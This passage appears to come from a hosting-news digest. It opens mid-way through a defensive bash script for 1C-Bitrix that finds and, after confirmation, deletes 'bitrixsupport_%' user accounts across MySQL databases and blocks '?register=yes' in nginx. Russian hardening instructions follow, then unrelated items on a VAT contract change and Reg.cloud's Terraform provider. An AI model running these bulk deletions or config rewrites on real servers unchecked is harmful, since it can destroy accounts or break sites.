				"USE $db; DELETE FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null
			else
				mysql -N -e \
				"USE $db; DELETE FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null
			fi

			if [[ -n "$container_id" ]]; then
				remaining=$(docker exec "$container_id" mysql -N -e \
				"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)
			else
				remaining=$(mysql -N -e \
				"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)
			fi

			if [[ "$remaining" -eq 0 ]]; then
				echo -e "${green}No remaining bitrixsupport_% users in ${container_image:-local} $db (${container_id:-host})${reset}"
				echo
			else
				echo -e "${red}Users still exist in $db${reset}"
				echo
			fi
		else
			echo "Skipping deletion for bitrixsupport_% users in ${container_image:-local} $db (${container_id:-host})"
			echo
		fi
	}

	# Docker MySQL
	if command -v docker &>/dev/null; then
		while read -r id image; do
			echo "$image" | grep -qiE 'percona|mysql|mariadb' || continue

			check_mysql_connection "$id" || {
				echo "${red}ERROR.${reset} Cannot connect to MySQL in container $image ($id)"
				continue
			}

			mysql_accessible=1

			dbs=$(docker exec "$id" mysql -N -e "SHOW DATABASES" 2>/dev/null | \
			      grep -Ev '^(information_schema|performance_schema|mysql|sys)')

			while read -r db; do
				[[ -z "$db" ]] && continue

				docker exec "$id" mysql -N -e \
				"USE $db; SHOW TABLES LIKE 'b_user';" 2>/dev/null | grep -q b_user || continue

				users=$(docker exec "$id" mysql -N -e \
				"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)

				if [[ "$users" -gt 0 ]]; then
					found_any=1
					process_deletion_confirm "$db" "$id" "$image"
				fi
			done <<< "$dbs"
		done < <(docker ps --format '{{.ID}} {{.Image}}')
	fi

	# Local MySQL
	if command -v mysql &>/dev/null; then
		check_mysql_connection "" || {
			echo "${red}ERROR.${reset} Cannot connect to local MySQL"
			return
		}

		mysql_accessible=1
		dbs=$(mysql -N -e "SHOW DATABASES" 2>/dev/null | \
		      grep -Ev '^(information_schema|performance_schema|mysql|sys)')

		while read -r db; do
			[[ -z "$db" ]] && continue

			mysql -N -e "USE $db; SHOW TABLES LIKE 'b_user';" 2>/dev/null | grep -q b_user || continue

			users=$(mysql -N -e \
			"USE $db; SELECT COUNT(*) FROM b_user WHERE LOGIN LIKE 'bitrixsupport_%';" 2>/dev/null)

			if [[ "$users" -gt 0 ]]; then
				found_any=1
				process_deletion_confirm "$db" "" ""
			fi
		done <<< "$dbs"
	fi

	[[ $found_any -eq 0 && $mysql_accessible -eq 1 ]] && \
	echo -e "${green}Users like bitrixsupport_% were not found in any MySQL DBs${reset}"
}

block_all_register_in_nginx () {
    echo
    CONF_FILE="/etc/nginx/bx/conf/bitrix.conf"
    DENY_CODE='# Deny 1C site user registration \nif ($arg_register = "yes") {\n  return 403;\n}\n'
    MGR_BIN="/usr/local/mgr5/sbin/mgrctl"
    
    function check_nginx ()
    {
        nginx -t &> /dev/null
    }
    
    function apply_fix ()
    {
        local target_file="$1" config_type="$2"
        
        # Check if fix already applied
        grep -Eq '^[[:space:]]*if[[:space:]]*\(\$arg_register[[:space:]]*=[[:space:]]*"yes"\)' "$target_file" 2> /dev/null && {
            echo "${green}\"?register=yes\" URL arguments already blocked in $target_file${reset}"
            return 0
        }
        
        echo "${red}DANGEROUS. Check with the developer first${reset}"
        read -rp "Block all \"?register=yes\" URL arguments globally in nginx? [y/N]: " answer
        answer=${answer:-N}
        [[ ! "$answer" =~ ^[Yy]$ ]] && return 1
        
        if [[ "$config_type" == "direct" ]]
        then
            # Direct modification of nginx config
            check_nginx || {
                echo "${red}nginx -t failed before fix${reset}"
                return 1
            }
            \cp -f "$target_file" "$target_file.bak"
            echo -e "$DENY_CODE" > "$target_file.tmp"
            cat "$target_file.bak" >> "$target_file.tmp"
            \mv -f "$target_file.tmp" "$target_file"
        else
            # Create include file for ISP Manager
            echo -e "$DENY_CODE" > "$target_file"
        fi
        
        if check_nginx && systemctl restart nginx
        then
            echo -e "${green}All \"?register=yes\" URL arguments successfully blocked in $target_file${reset}\nNginx restarted successfully"
            [[ "$config_type" == "direct" ]] && \rm -f "$target_file.bak"
            return 0
        else
            echo "${red}nginx -t failed after fix${reset}"
            [[ "$config_type" == "direct" ]] && \mv -f "$target_file.bak" "$target_file" || \rm -f "$target_file"
            check_nginx && echo "${green}Reverting success. No changes was made.${reset}" || \
                echo "${red}Nginx configtest error. Check nginx -t manually.${reset}"
            return 1
        fi
    }
    
    # Main logic: apply fix based on environment
    if [[ -f "$CONF_FILE" ]]
    then
        apply_fix "$CONF_FILE" "direct"
    else
        if [[ -x "$MGR_BIN" ]]
        then
            apply_fix "/etc/nginx/vhosts-includes/bitrix_reg_global_deny.conf" "include"
        else
            echo "${red}No /etc/nginx/bx/conf/bitrix.conf or ISP Manager were found. Cannot apply fix.${reset}"
            return 1
        fi
    fi
}

# Execute all three security fixes
bitrix_fix_reg_paths
mysql_all_db_del_bitrixsupport
block_all_register_in_nginx


Как ограничить регистрацию на демо-страницах
Если регистрация пользователей на сайте не требуется, добавьте следующий блок в начало файла /etc/nginx/bx/conf/bitrix.conf:
#Deny 1C site user registration
if ($arg_register = "yes") {
    return 403;
}

Если регистрация в целом нужна, но нужно закрыть устаревшие формы:

Добавьте файлы .htaccess со следующим содержимым:
Order allow,deny
Deny from all

Добавьте их в директории (только если они существуют):
bitrix/wizards/bitrix/demo/public_files/ru/auth/.htaccess
bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/custom-registration/.htaccess
bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/my-components/.htaccess
bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/.htaccess
install/wizards/bitrix/infoportal/site/public/ru/personal/profile/.htaccess
install/wizards/bitrix/infoportal/site/public/ru/board/my/.htaccess

Рекомендуем проверить ваш проект как можно скорее.

Изменения в Договоре об участии в партнерской программе



С 1 января 2026 года вступает в силу изменение ставки НДС. В связи с этим в пункт 4.7 договора об участии в партнерской программе внесены изменения.

Согласно новой редакции пункта 4.7:
  • Российские юрлица / ИП — самостоятельно исчисляют и уплачивают НДС (если являются плательщиками);
  • Иностранные юрлица / ИП — самостоятельно уплачивают налоги по законодательству своей страны. Удержание НДС и требование о сертификате резидентства отменяются;
  • Физические лица — изменений нет, НДФЛ удерживается Заказчиком.

Изменения вступят в силу с 1 января 2026 года.

https://selectel.ru

Рег.облако автоматизировал управление облаком с помощью кода



Компания упростила внедрение Infrastructure as Code (IaC) для команд разработки, выпустив Terraform-провайдер. С помощью нового решения DevOps- и IT-команды могут быстрее и безопаснее управлять облачной инфраструктурой, снижая операционные риски и упрощая масштабирование сервисов в облаке.

Облачный провайдер Рег.облако представил новый инструмент в облаке, который позволяет DevOps-инженерам и другим IТ-специалистам описывать и управлять облачными серверами и их снэпшотами в виде кода, интегрируя инфраструктуру в привычные процессы разработки и CI/CD-пайплайны.
www.reg.cloud/support/cloud/instrumenty/terraform/

Провайдеры Terraform представлены в виде плагинов и позволяют взаимодействовать с API конкретной облачной платформы: быстро разворачивать и изменять инфраструктуру, поддерживать несколько идентичных сред для разработки, тестирования и продакшена, отслеживать историю изменений через систему контроля версий.

Сама инфраструктура описывается как код, что упрощает совместную работу команд и позволяет безопасно и предсказуемо вносить изменения. Включение инфраструктуры в CI/CD снижает операционные риски и делает масштабирование и обслуживание облачных ресурсов быстрее и стабильнее. Terraform автоматически создает, изменяет или удаляет ресурсы, чтобы привести инфраструктуру в соответствие с заданным описанием.

Мы видим, что бизнес всё активнее использует инфраструктуру как код, и наша задача — дать инструменты, которые позволяют безопасно и прозрачно управлять ресурсами в облаке. Клиентам больше не нужно вручную поддерживать инфраструктуру или тратить время на повторяющиеся операции. Инструмент снизит вероятность ошибок, ускорит выпуск продуктов и сделает работу команд предсказуемее
отмечает Алексей Тюняев, директор по облачным продуктам Рег.облака.

Конфигурация инфраструктуры Рег.облака описывается в файлах на языке HCL, синтаксис которого близок к YAML, или в виде JSON-файлов. Файлы можно хранить в системах контроля версий (Git), рецензировать наравне с прикладным кодом, тестировать и переиспользовать в разных проектах. Провайдер обеспечивает управление IaaS-ресурсами Рег.облака, включая облачные серверы и их снэпшоты, и может быть интегрирован в существующие DevOps- и CI/CD-процессы.